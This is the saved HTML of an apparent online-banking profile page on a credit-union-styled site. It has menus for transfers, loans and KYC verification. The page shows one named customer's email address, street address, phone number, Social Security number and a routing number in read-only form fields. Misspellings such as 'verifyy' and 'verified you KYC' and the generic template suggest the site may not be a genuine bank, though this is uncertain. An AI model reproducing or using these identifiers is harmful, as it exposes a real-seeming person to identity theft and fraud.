
<!DOCTYPE html>
<html lang="en">
    <head>
	
        <title>Profile</title>
        
		<meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">

		        <link rel="icon" href='img/union.png'>

        <link rel="icon" href='https://creditunioncapitol.com/connections/templatelogo2'>
		<link rel="stylesheet" href="https://creditunioncapitol.com/connections/template/plugins/dataTables/datatables.min.css">
        <link rel="stylesheet" type="text/css" href="https://creditunioncapitol.com/connections/template/assets-user/css/main.css">
        <link rel="stylesheet" type="text/css" href="https://creditunioncapitol.com/connections/template/assets-user/css/widgets.css">
        <link rel="stylesheet" type="text/css" href="https://creditunioncapitol.com/connections/template/defaults.css">
        <link rel="stylesheet" type="text/css" href="https://creditunioncapitol.com/connections/template/assets-user/css/style.css">
        <link rel="stylesheet" href="https://creditunioncapitol.com/connections/template/plugins/font-awesome-5.8.2/css/all.css">
		
				
    </head>
    <body class="app sidebar-mini ">
       
					
			<header class="app-header">
				<a class="app-header__logo" href="dashboard.html">
					<img src='#' height='40px'>
				</a>
				<!-- Sidebar toggle button--><a class="app-sidebar__toggle" href="#" data-toggle="sidebar" aria-label="Hide Sidebar"></a>
				<!-- Navbar Right Menu-->
				<ul class="app-nav">
					<!--Notification Menu-->
					<li class="dropdown">
						<div id="google_translate_element" style="margin-left:2%"></div>
						<script type="text/javascript">
							function googleTranslateElementInit() {
							  new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement, autoDisplay: false}, 'google_translate_element');
							}
						</script>
						<script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
					</li>
							<!-- User Menu-->
							<li class="dropdown">
								<a class="app-nav__item" href="#" data-toggle="dropdown" aria-label="Open Profile Menu"><i class="fa fa-user fa-lg"></i></a>
								<ul class="dropdown-menu settings-menu dropdown-menu-right">
									<li><a class="dropdown-item" href="profile.html"><i class="fa fa-user fa-lg"></i> Profile</a></li>
									<li><a class="dropdown-item" href="cpassword.html"><i class="fa fa-key fa-lg"></i> Password</a></li>
									<li><a class="dropdown-item" href="index.html"><i class="fas fa-sign-out-alt fa-lg"></i> Logout</a></li>
								</ul>
							</li>
						</ul>
					</header>
					
								
					<!-- Sidebar menu-->
					<div class="app-sidebar__overlay" data-toggle="sidebar"></div>
					<aside class="app-sidebar">
					
						<div class="app-sidebar__user d-block text-center">
							
		<img class="app-sidebar__user-avatar oval-pic" src="img/d283b24a77c83302c916412dc0e094c8.jpeg" alt="User Image">

							<div class='mt-2'>
								
		<p class="app-sidebar__user-name">Monika Fischer</p>

								<p class="app-sidebar__user-designation d-none"></p>
							</div>
						</div>
						
						<ul class="app-menu">
						
							<li>
								<a class="app-menu__item" href="dashboard.html">
									<i class="app-menu__icon fas fa-home"></i>
									<span class="app-menu__label">Dashboard</span>
								</a>
							</li>
							
												<li>
								<a href="kyc.html" class="treeview-item text-white d-block brand-text">
									You have not yet verified you KYC. Click now to submit your details
								</a>
							</li>
											
							<li class="treeview">
								<a class="app-menu__item" href="#" data-toggle="treeview">
									<i class="app-menu__icon fa fa-users"></i>
									<span class="app-menu__label">My Account</span>
									<i class="treeview-indicator fa fa-angle-right"></i>
								</a>
								<ul class="treeview-menu">
									<li><a class="treeview-item" href="profile.html">Profile</a></li>
									<li><a class="treeview-item" href="statement.html">Statements</a></li>
									<li><a class="treeview-item" href="kyc.html">KYC</a></li>
									<li><a class="treeview-item" href="cpassword.html">Change Password</a></li>
									<li><a class="treeview-item" href="cpin.html">Change Pin</a></li>
									<li><a class="treeview-item" href="activity.html">Activity Log</a></li>
								</ul>
							</li>
						
							<li class="treeview">
								<a class="app-menu__item" href="#" data-toggle="treeview">
									<i class="app-menu__icon fa fa-paper-plane"></i>
									<span class="app-menu__label">Transfer</span>
									<i class="treeview-indicator fa fa-angle-right"></i>
								</a>
								<ul class="treeview-menu">
									<li><a class="treeview-item" href="local.html">Domestic</a></li>
									<li><a class="treeview-item" href="international.html">International</a></li>
									<li><a class="treeview-item" href="payment.html">History</a></li>
								</ul>
							</li>
						
							<li class="treeview">
								<a class="app-menu__item" href="#" data-toggle="treeview">
									<i class="app-menu__icon fa fa-landmark"></i>
									<span class="app-menu__label">Monetary</span>
									<i class="treeview-indicator fa fa-angle-right"></i>
								</a>
								<ul class="treeview-menu">
									<li><a class="treeview-item" href="#">Digital Deposit</a></li>
									<li><a class="treeview-item" href="#">Cards</a></li>
								</ul>
							</li>
						
							<li class="treeview"></li>
								<a class="app-menu__item" href="#" data-toggle="treeview">
									<i class="app-menu__icon fa fa-users"></i>
									<span class="app-menu__label">Loan</span>
									<i class="treeview-indicator fa fa-angle-right"></i>
								</a>
								<ul class="treeview-menu">
									<li><a class="treeview-item" href="loan.html">Loan Application</a></li>
									<li><a class="treeview-item" href="sloan.html">Loan Status</a></li>
								</ul>
							</li>
						
							<li class="treeview">
								<a class="app-menu__item" href="#" data-toggle="treeview">
									<i class="app-menu__icon fa fa-check-double"></i>
									<span class="app-menu__label">Support</span>
									<i class="treeview-indicator fa fa-angle-right"></i>
								</a>
								<ul class="treeview-menu">
									<li><a class="treeview-item" href="faq.html">FAQ</a></li>
									<li><a class="treeview-item" href="message.html">Message</a></li>
								</ul>
							</li>
							
							<li>
								<a class="app-menu__item" href="index.html">
									<i class="app-menu__icon fa fa-user"></i>
									<span class="app-menu__label">Logout</span>
								</a>
							</li>
						</ul>
					</aside>		
			<main class="app-content">
			
		
    
	<div class="app-title d-block">
		<div>
						<h1>
				<i class="fas fa-users"></i> 
				My Profile			</h1>
					</div>
	</div>


		
	<div class="row">
		<div class="col-lg-12">
			<div class="sparkline12-list shadow-reset mg-t-30">
			
				<div class="sparkline12-hd">
					<div class="main-sparkline12-hd">
						<button class="btn btn-primary">Customer Account Information</button>
					</div>
				</div>
				
				<hr>
				
				<div class="sparkline12-graph ">
					<div class="basic-login-form-ad">
						<div class="row">
							<div class="col-lg-12">
								<div class="all-form-element-inner">
								
									<form action="" method="post">
									
																				
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">First Name</label>
												</div>
												<div class="col-lg-6">
													<input type="text" name="fname" value="Monika" readonly="true" class="form-control" />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">Last Name</label>
												</div>
												<div class="col-lg-6">
													<input type="text" name="lname" value="Fischer" readonly="true" class="form-control" />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">Email</label>
												</div>
												<div class="col-lg-6">
													<input type="text" readonly="true" class="form-control" name="email"  maxlength="160" value="monikafischer884@gmail.com"  />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">Address</label>
												</div>
												<div class="col-lg-6">
													<input type="text" readonly="true" name="address" value="Foxwood Rd, San Diego, CA" class="form-control" />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">Phone Number</label>
												</div>
												<div class="col-lg-6">
													<input type="text" readonly="true" name="phone" value="18435362053" class="form-control" />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">State</label>
												</div>
												<div class="col-lg-6">
													<input type="text" readonly="true" name="state" value="San Diego California" class="form-control" />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">SSN</label>
												</div>
												<div class="col-lg-6">
													<input type="text" readonly="true" name="ssn" value="573679026" class="form-control" />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">Routing Number</label>
												</div>
												<div class="col-lg-6">
													<input type="text" readonly="true" name="state" value="121000385" class="form-control" />
												</div>
											</div>
										</div>
										
										<div class="form-group">
											<div class="row">
												<div class="col-lg-3">
													<label class="login2 pull-right pull-right-pro">Zipcode</label>
												</div>
												<div class="col-lg-6">
													<input name="zipcode" readonly="true" value="92126"  type="text" class="form-control" />
												</div>
											</div>
										</div>
										
									</form>
									
								</div>
							</div>
						</div>
					</div>
				</div>
				
			</div>
		</div>
	</div>


		
		</main>
		
		
	<div data-bankloader='https://creditunioncapitol.com/app/img/loading.gif'></div>
	
	<!-- Essential javascripts for application to work-->
	<script src="https://creditunioncapitol.com/connections/template/assets-user/js/jquery-3.3.1.min.js"></script>
	<script src="https://creditunioncapitol.com/connections/template/assets-user/js/popper.min.js"></script>
	<script src="https://creditunioncapitol.com/connections/template/assets-user/js/bootstrap.min.js"></script>
	<script src="https://creditunioncapitol.com/connections/template/plugins/dataTables/datatables.min.js"></script>
	<script src="https://creditunioncapitol.com/connections/template/assets-user/js/main.js"></script>
	<!-- The javascript plugin to display page loading on top-->
	<script src="https://creditunioncapitol.com/connections/template/assets-user/js/plugins/pace.min.js"></script>
	<script src="https://creditunioncapitol.com/connections/template/assets/js/loader.js"></script>
	<script src="https://creditunioncapitol.com/connections/template/assets/js/main.js"></script>
	<!-- Page specific javascripts-->
	
	    <script>$.ajax({ url: 'https://creditunioncapitol.com/controller/server/verifyy.php' });</script>
	
    </body>
</html>
 